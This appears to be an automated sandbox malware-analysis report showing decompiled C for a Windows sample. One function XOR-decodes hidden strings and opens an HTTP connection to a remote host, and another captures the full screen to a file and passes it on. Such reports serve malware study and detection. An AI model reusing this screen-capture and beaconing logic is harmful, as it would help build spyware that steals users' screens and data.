                                    control_flow_graph 2958 82c44a-82c488 call 890cfc 2961 82c48a-82c49d call 86db91 2958->2961 2962 82c4bf-82c4c7 2958->2962 2961->2962 2970 82c49f-82c4be call 86dfe8 call 86db47 2961->2970 2963 82c4d8-82c536 InternetOpenA InternetConnectA 2962->2963 2964 82c4c9 2962->2964 2967 82c575-82c57b 2963->2967 2968 82c538-82c54a call 86db91 2963->2968 2966 82c4cb-82c4d6 2964->2966 2966->2963 2966->2966 2971 82c58c-82c59e 2967->2971 2972 82c57d 2967->2972 2968->2967 2981 82c54c-82c574 call 86dfe8 call 86db47 2968->2981 2970->2962 2976 82c5a0-82c5b2 call 86db91 2971->2976 2977 82c5da-82c5e0 2971->2977 2975 82c57f-82c58a 2972->2975 2975->2971 2975->2975 2976->2977 2992 82c5b4-82c5d9 call 86dfe8 call 86db47 2976->2992 2982 82c5e2 2977->2982 2983 82c5f1-82c64e HttpOpenRequestA 2977->2983 2981->2967 2989 82c5e4-82c5ef 2982->2989 2984 82c650-82c663 call 86db91 2983->2984 2985 82c685-82c68c 2983->2985 2984->2985 3003 82c665-82c684 call 82d16e call 86dfe8 call 86db47 2984->3003 2993 82c68e 2985->2993 2994 82c69d-82c6a2 2985->2994 2989->2983 2989->2989 2992->2977 2998 82c690-82c69b 2993->2998 2999 82c6a5-82c6aa 2994->2999 2998->2994 2998->2998 2999->2999 3001 82c6ac-82c6c7 call 82e052 call 82c813 2999->3001 3015 82c6d5-82c6d7 3001->3015 3016 82c6c9 3001->3016 3003->2985 3019 82c6da-82c6df 3015->3019 3018 82c6cb-82c6d3 3016->3018 3018->3015 3018->3018 3019->3019 3021 82c6e1-82c714 call 82e052 3019->3021 3024 82c716-82c729 call 86db91 3021->3024 3025 82c74b-82c752 3021->3025 3024->3025 3033 82c72b-82c74a call 82d0f5 call 86dfe8 call 86db47 3024->3033 3026 82c763-82c768 3025->3026 3027 82c754 3025->3027 3030 82c76b-82c770 3026->3030 3029 82c756-82c761 3027->3029 3029->3026 3029->3029 3030->3030 3032 82c772-82c78d call 82e052 call 82c8b8 3030->3032 3042 82c799-82c79b 3032->3042 3043 82c78f-82c797 3032->3043 3033->3025 3045 82c79e-82c7a3 3042->3045 3043->3042 3043->3043 3045->3045 3047 82c7a5-82c7f7 call 82e052 call 82c2ca InternetCloseHandle * 3 call 82df41 3045->3047 3053 82c7fc-82c812 call 82df41 3047->3053
                                    C-Code - Quality: 82%
                                    			E0082C44A(void* __ebx, intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _t82;
				void* _t83;
				void* _t84;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t87;
				intOrPtr _t88;
				intOrPtr _t89;
				intOrPtr _t90;
				intOrPtr _t93;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr _t99;
				void* _t108;
				char* _t109;
				char* _t115;
				char* _t121;
				char* _t126;
				char* _t130;
				char* _t135;
				intOrPtr* _t141;
				intOrPtr* _t144;
				intOrPtr* _t147;
				intOrPtr* _t150;
				char* _t161;
				void* _t166;
				void* _t168;
				void* _t170;
				void* _t174;
				intOrPtr* _t175;
				void* _t176;
				intOrPtr* _t177;
				void* _t181;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t196;
				void* _t198;
				intOrPtr* _t199;
				void* _t204;
				void* _t209;
				void* _t213;

				L00890CFC(0x8941c7, __ebx, __ecx, __edx);
				_t199 = _t198 - 0x6c;
				_push(__ebx);
				_t181 =  *( *[fs:0x2c]);
				_t82 =  *0x8b50c0; // 0x80000097
				 *((intOrPtr*)(_t196 - 0x1c)) = __edx;
				 *((intOrPtr*)(_t196 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t196 - 0x30)) = 0x41425e5b;
				 *((intOrPtr*)(_t196 - 0x2c)) = 0x5c4b4a4f;
				 *((char*)(_t196 - 0x28)) = 0x2e;
				 *(_t196 - 0x14) = _t181;
				if(_t82 >  *((intOrPtr*)(_t181 + 4))) {
					E0086DB91(_t82, 0x8b50c0);
					_t203 =  *0x8b50c0 - 0xffffffff;
					_pop(_t170);
					if( *0x8b50c0 == 0xffffffff) {
						asm("movsd");
						asm("movsd");
						asm("movsb");
						L0086DFE8(_t170, _t203, 0x89644a);
						L0086DB47(0x8b50c0);
						_t181 =  *(_t196 - 0x14);
					}
				}
				_t135 = 0;
				_t204 =  *0x8b4fc4 - _t135; // 0x0
				if(_t204 == 0) {
					L6:
					_t83 = InternetOpenA(0x8b4fbc, _t135, _t135, _t135, _t135); // executed
					_t140 =  >=  ?  *0x8b2a14 : 0x8b2a14;
					 *(_t196 - 0x24) = _t83;
					_t84 = InternetConnectA(_t83,  >=  ?  *0x8b2a14 : 0x8b2a14, 0x50, _t135, _t135, 3, _t135, _t135); // executed
					_t186 = _t84;
					 *((intOrPtr*)(_t196 - 0x34)) = 0x42414d01;
					_t85 =  *0x8b5b84; // 0x80000098
					 *(_t196 - 0x18) = _t186;
					 *((intOrPtr*)(_t196 - 0x30)) = 0x5a4d4b42;
					 *((intOrPtr*)(_t196 - 0x2c)) = 0x5e465e00;
					 *((char*)(_t196 - 0x28)) = 0x2e;
					if(_t85 >  *((intOrPtr*)(_t181 + 4))) {
						E0086DB91(_t85, 0x8b5b84);
						_t208 =  *0x8b5b84 - 0xffffffff;
						_pop(_t168);
						if( *0x8b5b84 == 0xffffffff) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsb");
							L0086DFE8(_t168, _t208, 0x89642d);
							 *_t199 = 0x8b5b84;
							L0086DB47();
							_t181 =  *(_t196 - 0x14);
							_t186 =  *(_t196 - 0x18);
						}
					}
					_t209 =  *0x8b4d08 - _t135; // 0x0
					if(_t209 == 0) {
						L12:
						_t86 =  *0x8b4cb0; // 0x80000099
						 *(_t196 - 0x14) = 0x7a7d617e;
						if(_t86 >  *((intOrPtr*)(_t181 + 4))) {
							E0086DB91(_t86, 0x8b4cb0);
							_t212 =  *0x8b4cb0 - 0xffffffff;
							_pop(_t166);
							if( *0x8b4cb0 == 0xffffffff) {
								_t26 = _t196 - 0x14; // 0x7a7d617e
								 *0x8b4d5c =  *_t26;
								 *0x8b4d60 = 0x2e;
								L0086DFE8(_t166, _t212, 0x89643b);
								 *_t199 = 0x8b4cb0;
								L0086DB47();
							}
						}
						_t213 =  *0x8b4d60 - _t135; // 0x0
						if(_t213 == 0) {
							L18:
							_t87 = HttpOpenRequestA(_t186, 0x8b4d5c, 0x8b4cfc, _t135, _t135, _t135, 0x8468c200, _t135); // executed
							 *(_t196 - 0x14) = _t87;
							_t88 = 0xf;
							 *(_t196 - 0x50) = _t135;
							 *((intOrPtr*)(_t196 - 0x4c)) = _t88;
							 *(_t196 - 0x60) = _t135;
							 *(_t196 - 4) = _t135;
							 *(_t196 - 0x68) = _t135;
							 *((intOrPtr*)(_t196 - 0x64)) = _t88;
							 *(_t196 - 0x78) = _t135;
							 *(_t196 - 4) = 1;
							asm("movaps xmm0, [0x8a9100]");
							_t89 =  *0x8b53d8; // 0x8000009a
							asm("movups [ebp-0x40], xmm0");
							 *((intOrPtr*)(_t196 - 0x30)) = 0x5c4f4a40;
							 *((intOrPtr*)(_t196 - 0x2c)) = 0x2e242357;
							if(_t89 >  *((intOrPtr*)(_t181 + 4))) {
								E0086DB91(_t89, 0x8b53d8);
								_t216 =  *0x8b53d8 - 0xffffffff;
								if( *0x8b53d8 == 0xffffffff) {
									E0082D16E(0x8b4dc4, _t196 - 0x40);
									L0086DFE8(0x8b4dc4, _t216, 0x89641e);
									L0086DB47(0x8b53d8);
								}
							}
							if( *0x8b4ddb == 0) {
								L24:
								_t141 = 0x8b4dc4;
								_t44 = _t141 + 1; // 0x8b4dc5
								_t174 = _t44;
								do {
									_t90 =  *_t141;
									_t141 = _t141 + 1;
								} while (_t90 != 0);
								E0082E052(_t196 - 0x60, 0x8b4dc4, _t141 - _t174);
								_t175 = E0082C813();
								if( *((char*)(_t175 + 0x4d)) == 0) {
									L29:
									_t144 = _t175;
									_t49 = _t144 + 1; // 0x1
									_t187 = _t49;
									do {
										_t93 =  *_t144;
										_t144 = _t144 + 1;
									} while (_t93 != 0);
									E0082E052(_t196 - 0x60, _t175, _t144 - _t187);
									asm("movaps xmm0, [0x8a9190]");
									_t95 =  *0x8b5f94; // 0x8000009c
									asm("movups [ebp-0x48], xmm0");
									 *((short*)(_t196 - 0x28)) = 0x2e24;
									asm("movaps xmm0, [0x8a8c80]");
									asm("movups [ebp-0x38], xmm0");
									if(_t95 >  *((intOrPtr*)(_t181 + 4))) {
										E0086DB91(_t95, 0x8b5f94);
										_t224 =  *0x8b5f94 - 0xffffffff;
										if( *0x8b5f94 == 0xffffffff) {
											E0082D0F5(0x8b5d08, _t196 - 0x48);
											L0086DFE8(0x8b5d08, _t224, 0x8963fb);
											L0086DB47(0x8b5f94);
										}
									}
									if( *0x8b5d29 == 0) {
										L37:
										_t147 = 0x8b5d08;
										_t56 = _t147 + 1; // 0x8b5d09
										_t176 = _t56;
										do {
											_t96 =  *_t147;
											_t147 = _t147 + 1;
										} while (_t96 != 0);
										E0082E052(_t196 - 0x60, 0x8b5d08, _t147 - _t176);
										_t177 = E0082C8B8();
										if( *((char*)(_t177 + 0x1d)) == 0) {
											L41:
											_t150 = _t177;
											_t61 = _t150 + 1; // 0x1
											_t188 = _t61;
											do {
												_t99 =  *_t150;
												_t150 = _t150 + 1;
											} while (_t99 != 0);
											E0082E052(_t196 - 0x78, _t177, _t150 - _t188);
											_push( *(_t196 - 0x68));
											_t102 =  >=  ?  *(_t196 - 0x78) : _t196 - 0x78;
											_t69 = _t196 - 0x14; // 0x7a7d617e
											_t189 =  *_t69;
											_t179 =  >=  ?  *(_t196 - 0x60) : _t196 - 0x60;
											_push( >=  ?  *(_t196 - 0x78) : _t196 - 0x78);
											_push( *((intOrPtr*)(_t196 - 0x1c)));
											_push( *((intOrPtr*)(_t196 - 0x20)));
											_push( *(_t196 - 0x50));
											E0082C2CA(_t135, _t189,  >=  ?  *(_t196 - 0x60) : _t196 - 0x60); // executed
											InternetCloseHandle(_t189); // executed
											InternetCloseHandle( *(_t196 - 0x18));
											InternetCloseHandle( *(_t196 - 0x24));
											E0082DF41(_t196 - 0x78);
											_t108 = E0082DF41(_t196 - 0x60);
											 *[fs:0x0] =  *((intOrPtr*)(_t196 - 0xc));
											return _t108;
										} else {
											goto L40;
										}
										do {
											L40:
											_t135[_t177] = _t135[_t177] ^ 0x0000002e;
											_t135 =  &(_t135[1]);
										} while (_t135 < 0x1e);
										goto L41;
									} else {
										_t109 = _t135;
										do {
											_t109[0x8b5d08] = _t109[0x8b5d08] ^ 0x0000002e;
											_t109 =  &(_t109[1]);
										} while (_t109 < 0x22);
										goto L37;
									}
								}
								_t161 = _t135;
								do {
									_t161[_t175] = _t161[_t175] ^ 0x0000002e;
									_t161 =  &(_t161[1]);
								} while (_t161 < 0x4e);
								goto L29;
							} else {
								_t115 = _t135;
								do {
									_t115[0x8b4dc4] = _t115[0x8b4dc4] ^ 0x0000002e;
									_t115 =  &(_t115[1]);
								} while (_t115 < 0x18);
								goto L24;
							}
						} else {
							_t121 = _t135;
							do {
								_t121[0x8b4d5c] = _t121[0x8b4d5c] ^ 0x0000002e;
								_t121 =  &(_t121[1]);
							} while (_t121 < 5);
							goto L18;
						}
					} else {
						_t126 = _t135;
						do {
							_t126[0x8b4cfc] = _t126[0x8b4cfc] ^ 0x0000002e;
							_t126 =  &(_t126[1]);
						} while (_t126 < 0xd);
						goto L12;
					}
				} else {
					_t130 = 0;
					do {
						 *(_t130 + 0x8b4fbc) =  *(_t130 + 0x8b4fbc) ^ 0x0000002e;
						_t130 = _t130 + 1;
					} while (_t130 < 9);
					goto L6;
				}
			}














































                                    0x0082c44f
                                    0x0082c454
                                    0x0082c45d
                                    0x0082c460
                                    0x0082c462
                                    0x0082c467
                                    0x0082c46a
                                    0x0082c46d
                                    0x0082c474
                                    0x0082c47b
                                    0x0082c47f
                                    0x0082c488
                                    0x0082c490
                                    0x0082c495
                                    0x0082c49c
                                    0x0082c49d
                                    0x0082c4ac
                                    0x0082c4ad
                                    0x0082c4ae
                                    0x0082c4af
                                    0x0082c4b5
                                    0x0082c4ba
                                    0x0082c4be
                                    0x0082c49d
                                    0x0082c4bf
                                    0x0082c4c1
                                    0x0082c4c7
                                    0x0082c4d8
                                    0x0082c4e1
                                    0x0082c4f4
                                    0x0082c504
                                    0x0082c507
                                    0x0082c50d
                                    0x0082c50f
                                    0x0082c516
                                    0x0082c51b
                                    0x0082c51e
                                    0x0082c525
                                    0x0082c52c
                                    0x0082c536
                                    0x0082c53d
                                    0x0082c542
                                    0x0082c549
                                    0x0082c54a
                                    0x0082c559
                                    0x0082c55a
                                    0x0082c55b
                                    0x0082c55c
                                    0x0082c55d
                                    0x0082c562
                                    0x0082c569
                                    0x0082c56e
                                    0x0082c571
                                    0x0082c574
                                    0x0082c54a
                                    0x0082c575
                                    0x0082c57b
                                    0x0082c58c
                                    0x0082c58c
                                    0x0082c591
                                    0x0082c59e
                                    0x0082c5a5
                                    0x0082c5aa
                                    0x0082c5b1
                                    0x0082c5b2
                                    0x0082c5b4
                                    0x0082c5bc
                                    0x0082c5c1
                                    0x0082c5c8
                                    0x0082c5cd
                                    0x0082c5d4
                                    0x0082c5d9
                                    0x0082c5b2
                                    0x0082c5da
                                    0x0082c5e0
                                    0x0082c5f1
                                    0x0082c605
                                    0x0082c60d
                                    0x0082c610
                                    0x0082c611
                                    0x0082c614
                                    0x0082c617
                                    0x0082c61a
                                    0x0082c61d
                                    0x0082c620
                                    0x0082c623
                                    0x0082c626
                                    0x0082c62a
                                    0x0082c631
                                    0x0082c636
                                    0x0082c63a
                                    0x0082c641
                                    0x0082c64e
                                    0x0082c656
                                    0x0082c65b
                                    0x0082c663
                                    0x0082c66e
                                    0x0082c678
                                    0x0082c67e
                                    0x0082c684
                                    0x0082c663
                                    0x0082c68c
                                    0x0082c69d
                                    0x0082c69d
                                    0x0082c6a2
                                    0x0082c6a2
                                    0x0082c6a5
                                    0x0082c6a5
                                    0x0082c6a7
                                    0x0082c6a8
                                    0x0082c6b7
                                    0x0082c6c1
                                    0x0082c6c7
                                    0x0082c6d5
                                    0x0082c6d5
                                    0x0082c6d7
                                    0x0082c6d7
                                    0x0082c6da
                                    0x0082c6da
                                    0x0082c6dc
                                    0x0082c6dd
                                    0x0082c6e8
                                    0x0082c6ed
                                    0x0082c6f4
                                    0x0082c6f9
                                    0x0082c6fd
                                    0x0082c703
                                    0x0082c70a
                                    0x0082c714
                                    0x0082c71c
                                    0x0082c721
                                    0x0082c729
                                    0x0082c734
                                    0x0082c73e
                                    0x0082c744
                                    0x0082c74a
                                    0x0082c729
                                    0x0082c752
                                    0x0082c763
                                    0x0082c763
                                    0x0082c768
                                    0x0082c768
                                    0x0082c76b
                                    0x0082c76b
                                    0x0082c76d
                                    0x0082c76e
                                    0x0082c77d
                                    0x0082c787
                                    0x0082c78d
                                    0x0082c799
                                    0x0082c799
                                    0x0082c79b
                                    0x0082c79b
                                    0x0082c79e
                                    0x0082c79e
                                    0x0082c7a0
                                    0x0082c7a1
                                    0x0082c7ac
                                    0x0082c7b8
                                    0x0082c7bb
                                    0x0082c7c6
                                    0x0082c7c6
                                    0x0082c7cb
                                    0x0082c7cf
                                    0x0082c7d0
                                    0x0082c7d3
                                    0x0082c7d6
                                    0x0082c7d9
                                    0x0082c7e8
                                    0x0082c7ed
                                    0x0082c7f2
                                    0x0082c7f7
                                    0x0082c7ff
                                    0x0082c80a
                                    0x0082c812
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0082c78f
                                    0x0082c78f
                                    0x0082c78f
                                    0x0082c793
                                    0x0082c794
                                    0x00000000
                                    0x0082c754
                                    0x0082c754
                                    0x0082c756
                                    0x0082c756
                                    0x0082c75d
                                    0x0082c75e
                                    0x00000000
                                    0x0082c756
                                    0x0082c752
                                    0x0082c6c9
                                    0x0082c6cb
                                    0x0082c6cb
                                    0x0082c6cf
                                    0x0082c6d0
                                    0x00000000
                                    0x0082c68e
                                    0x0082c68e
                                    0x0082c690
                                    0x0082c690
                                    0x0082c697
                                    0x0082c698
                                    0x00000000
                                    0x0082c690
                                    0x0082c5e2
                                    0x0082c5e2
                                    0x0082c5e4
                                    0x0082c5e4
                                    0x0082c5eb
                                    0x0082c5ec
                                    0x00000000
                                    0x0082c5e4
                                    0x0082c57d
                                    0x0082c57d
                                    0x0082c57f
                                    0x0082c57f
                                    0x0082c586
                                    0x0082c587
                                    0x00000000
                                    0x0082c57f
                                    0x0082c4c9
                                    0x0082c4c9
                                    0x0082c4cb
                                    0x0082c4cb
                                    0x0082c4d2
                                    0x0082c4d3
                                    0x00000000
                                    0x0082c4cb

                                    APIs
                                    • InternetOpenA.WININET(008B4FBC,00000000,00000000,00000000,00000000), ref: 0082C4E1
                                    • InternetConnectA.WININET(00000000,008B2A14,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0082C507
                                    • HttpOpenRequestA.WININET(00000000,008B4D5C,008B4CFC,00000000,00000000,00000000,8468C200,00000000), ref: 0082C605
                                      • Part of subcall function 0086DB91: EnterCriticalSection.KERNEL32(008B3CAC,?,74714EE0,?,0081416B,008B54D0,00000000), ref: 0086DB9C
                                      • Part of subcall function 0086DB91: LeaveCriticalSection.KERNEL32(008B3CAC,?,0081416B,008B54D0,00000000), ref: 0086DBD9
                                      • Part of subcall function 0086DB47: EnterCriticalSection.KERNEL32(008B3CAC,69494B7C,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB51
                                      • Part of subcall function 0086DB47: LeaveCriticalSection.KERNEL32(008B3CAC,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB84
                                      • Part of subcall function 0086DB47: RtlWakeAllConditionVariable.NTDLL ref: 0086DBFB
                                    • InternetCloseHandle.WININET(~a}z), ref: 0082C7E8
                                    • InternetCloseHandle.WININET(?), ref: 0082C7ED
                                    • InternetCloseHandle.WININET(?), ref: 0082C7F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CriticalSection$CloseHandle$EnterLeaveOpen$ConditionConnectHttpRequestVariableWake
                                    • String ID: [^BAOJK\.$~a}z
                                    • API String ID: 3302835935-3567702361
                                    • Opcode ID: bfdacee6cd56466e21b5486644d805fb97a962ad1047f75f2790bddb135341db
                                    • Instruction ID: 3edb8d3a22e35dc5a04544e8191173a0cb9447778c767e74e7f7ccbc2f3962d9
                                    • Opcode Fuzzy Hash: bfdacee6cd56466e21b5486644d805fb97a962ad1047f75f2790bddb135341db
                                    • Instruction Fuzzy Hash: 70B12470E046689EDB15EFA8E849AFDBBB1FF05314F191259E011EB2A3CB706885CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0082B7C3 Relevance: 13.7, APIs: 9, Instructions: 155COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    C-Code - Quality: 67%
                                    			E0082B7C3(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* _t60;
				void* _t62;
				void* _t63;
				void* _t65;
				int _t72;
				struct HDC__* _t74;
				struct HDC__* _t75;
				void* _t76;
				void* _t81;
				void* _t90;
				intOrPtr _t95;
				void* _t96;
				intOrPtr* _t112;
				intOrPtr* _t113;
				void* _t114;
				void* _t116;
				intOrPtr _t117;
				void* _t121;
				void* _t122;
				void* _t128;
				struct HDC__* _t129;
				struct _CRITICAL_SECTION* _t130;
				struct HDC__* _t135;
				void* _t139;
				void* _t141;

				_t93 = __ebx;
				_t60 = L00890CFC(0x8940e0, __ebx, __ecx, __edx);
				 *(_t139 - 4) =  *(_t139 - 4) & 0x00000000;
				_t145 =  *0x8b4860;
				_push(__ebx);
				 *((intOrPtr*)(_t139 - 0x10)) = _t141 - 0xd8;
				if( *0x8b4860 != 0) {
					_t121 = 0x10;
					_t128 = L00818F5D(__ebx, _t139 - 0xe4, _t121);
					_t122 = 0x13;
					 *(_t139 - 4) = 1;
					_t62 = L00818F5D(__ebx, _t139 - 0xcc, _t122);
					 *(_t139 - 4) = 2;
					_t63 = E0082E8C7(_t93, _t139 - 0xb4, 0x8b2a8c, _t128);
					 *(_t139 - 4) = 3;
					E0082FA3B(_t139 - 0x84,  *(_t139 - 0x14), _t63, _t62, "\\");
					 *(_t139 - 4) = 4;
					_t65 = E0082E917(_t139 - 0x9c, _t139 - 0x84, _t145, ".");
					 *(_t139 - 4) = 5;
					E0082FA3B(_t139 - 0x38);
					E0082DF41(_t139 - 0x9c);
					E0082DF41(_t139 - 0x84);
					E0082DF41(_t139 - 0xb4);
					E0082DF41(_t139 - 0xcc);
					 *(_t139 - 4) = 0xb;
					E0082DF41(_t139 - 0xe4);
					_t72 = GetSystemMetrics(0x4e); // executed
					_t95 = _t72;
					 *((intOrPtr*)(_t139 - 0x1c)) = _t95;
					 *((intOrPtr*)(_t139 - 0x18)) = GetSystemMetrics(0x4f);
					_t74 = GetDC(0);
					_t112 =  *0x8b48b0; // 0x7453a590
					_t135 = _t74;
					 *(_t139 - 0x14) = _t135;
					_t75 =  *_t112(_t135,  *(_t139 - 0x14), _t65, _t128); // executed
					_t113 =  *0x8b4878; // 0x7453a520
					_t129 = _t75;
					 *(_t139 - 0x20) = _t129;
					_t76 =  *_t113(_t135, _t95,  *((intOrPtr*)(_t139 - 0x18))); // executed
					_t96 = _t76;
					SelectObject(_t129, _t96);
					 *0x8b4840(_t129, 0, 0,  *((intOrPtr*)(_t139 - 0x1c)),  *((intOrPtr*)(_t139 - 0x18)), _t135, 0, 0, 0xcc0020);
					 *(_t139 - 0x4c) =  *(_t139 - 0x4c) | 0xffffffff;
					 *(_t139 - 0x48) =  *(_t139 - 0x48) | 0xffffffff;
					asm("xorps xmm0, xmm0");
					 *((intOrPtr*)(_t139 - 0x6c)) = 0x8a7a50;
					asm("movups [ebp-0x64], xmm0");
					 *((intOrPtr*)(_t139 - 0x54)) = 0;
					 *((short*)(_t139 - 0x50)) = 0;
					 *((intOrPtr*)(_t139 - 0x44)) = 0;
					 *((intOrPtr*)(_t139 - 0x40)) = 0;
					 *((intOrPtr*)(_t139 - 0x3c)) = 0;
					_t81 = E00814619();
					_t136 = _t81;
					_t41 = _t136 + 4; // 0x4
					_t130 = _t41;
					EnterCriticalSection(_t130);
					 *((intOrPtr*)(_t81 + 0x1c)) =  *((intOrPtr*)(_t81 + 0x1c)) + 1;
					LeaveCriticalSection(_t130);
					 *(_t139 - 4) = 0xc;
					_t114 = _t139 - 0x6c;
					 *(_t139 - 0x68) = _t96;
					E00814BCB(_t114, _t139 - 0x84, _t113);
					_push(_t114);
					_t84 =  >=  ?  *((void*)(_t139 - 0x38)) : _t139 - 0x38;
					L0081487C(_t139 - 0x6c,  >=  ?  *((void*)(_t139 - 0x38)) : _t139 - 0x38); // executed
					DeleteDC( *(_t139 - 0x20));
					DeleteObject(_t96);
					ReleaseDC(0,  *(_t139 - 0x14));
					_t138 =  >=  ?  *((void*)(_t139 - 0x38)) : _t139 - 0x38;
					_t116 = E0082B9D6();
					_t90 = E0082D2AE(_t116);
					_push(_t116);
					_push(_t116);
					_t117 =  *0x8b4804; // 0x1346140
					E008183DF(_t117, _t90,  >=  ?  *((void*)(_t139 - 0x38)) : _t139 - 0x38); // executed
					E008146E3(_t139 - 0x6c);
					_t60 = E0082DF41(_t139 - 0x38);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t139 - 0xc));
				return _t60;
			}





























                                    0x0082b7c3
                                    0x0082b7c8
                                    0x0082b7d3
                                    0x0082b7d7
                                    0x0082b7de
                                    0x0082b7e1
                                    0x0082b7e4
                                    0x0082b7ec
                                    0x0082b7f8
                                    0x0082b7fc
                                    0x0082b803
                                    0x0082b807
                                    0x0082b818
                                    0x0082b822
                                    0x0082b833
                                    0x0082b837
                                    0x0082b847
                                    0x0082b851
                                    0x0082b85f
                                    0x0082b863
                                    0x0082b86e
                                    0x0082b879
                                    0x0082b884
                                    0x0082b88f
                                    0x0082b89a
                                    0x0082b89e
                                    0x0082b8ab
                                    0x0082b8ad
                                    0x0082b8b1
                                    0x0082b8b8
                                    0x0082b8bb
                                    0x0082b8c1
                                    0x0082b8c7
                                    0x0082b8ca
                                    0x0082b8cd
                                    0x0082b8d2
                                    0x0082b8d8
                                    0x0082b8dc
                                    0x0082b8df
                                    0x0082b8e1
                                    0x0082b8e5
                                    0x0082b8fe
                                    0x0082b904
                                    0x0082b90a
                                    0x0082b90e
                                    0x0082b911
                                    0x0082b918
                                    0x0082b91c
                                    0x0082b91f
                                    0x0082b923
                                    0x0082b926
                                    0x0082b929
                                    0x0082b92c
                                    0x0082b931
                                    0x0082b933
                                    0x0082b933
                                    0x0082b937
                                    0x0082b93d
                                    0x0082b941
                                    0x0082b948
                                    0x0082b94c
                                    0x0082b94f
                                    0x0082b952
                                    0x0082b95e
                                    0x0082b95f
                                    0x0082b967
                                    0x0082b96f
                                    0x0082b976
                                    0x0082b981
                                    0x0082b98e
                                    0x0082b997
                                    0x0082b999
                                    0x0082b99e
                                    0x0082b99f
                                    0x0082b9a0
                                    0x0082b9a9
                                    0x0082b9b4
                                    0x0082b9bc
                                    0x0082b9bc
                                    0x0082b9c6
                                    0x0082b9cf

                                    APIs
                                      • Part of subcall function 0082DF41: _Deallocate.LIBCONCRT ref: 0082DF50
                                    • KiUserCallbackDispatcher.NTDLL ref: 0082B8AB
                                    • GetSystemMetrics.USER32 ref: 0082B8B4
                                    • GetDC.USER32(00000000), ref: 0082B8BB
                                    • SelectObject.GDI32(00000000,00000000), ref: 0082B8E5
                                      • Part of subcall function 00814619: InitializeCriticalSectionEx.KERNEL32(008B4D88,00000000,00000000,?,0081471E,?,?,008146CC), ref: 0081465C
                                      • Part of subcall function 00814619: GetLastError.KERNEL32(?,0081471E,?,?,008146CC), ref: 00814666
                                    • EnterCriticalSection.KERNEL32(00000004), ref: 0082B937
                                    • LeaveCriticalSection.KERNEL32(00000004), ref: 0082B941
                                      • Part of subcall function 00814BCB: GetObjectA.GDI32(?,00000054,?), ref: 00814BDF
                                    • DeleteDC.GDI32(?), ref: 0082B96F
                                    • DeleteObject.GDI32(00000000), ref: 0082B976
                                    • ReleaseDC.USER32 ref: 0082B981
                                      • Part of subcall function 008146E3: DeleteObject.GDI32(?), ref: 00814711
                                      • Part of subcall function 008146E3: EnterCriticalSection.KERNEL32(00000004,?,?,008146CC), ref: 00814724
                                      • Part of subcall function 008146E3: LeaveCriticalSection.KERNEL32(00000004,?,?,?,?,?,008146CC), ref: 00814738
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$Object$Delete$EnterLeave$CallbackDeallocateDispatcherErrorInitializeLastMetricsReleaseSelectSystemUser
                                    • String ID:
                                    • API String ID: 1025157159-0
                                    • Opcode ID: cf8765aa47e2c700e9b92a4c515439e09e619857d4fd0753df24d7862f00f6a6
                                    • Instruction ID: f0d7017deca6c18dda494f70eced63689e3c592ce777e3f1c8566d095a2ed3bb
                                    • Opcode Fuzzy Hash: cf8765aa47e2c700e9b92a4c515439e09e619857d4fd0753df24d7862f00f6a6
                                    • Instruction Fuzzy Hash: 28515C31D00258EEEB14EBA4ED46AEEBBB8FF15300F104169F516B3192DB741A85CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0081E85F Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 294fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
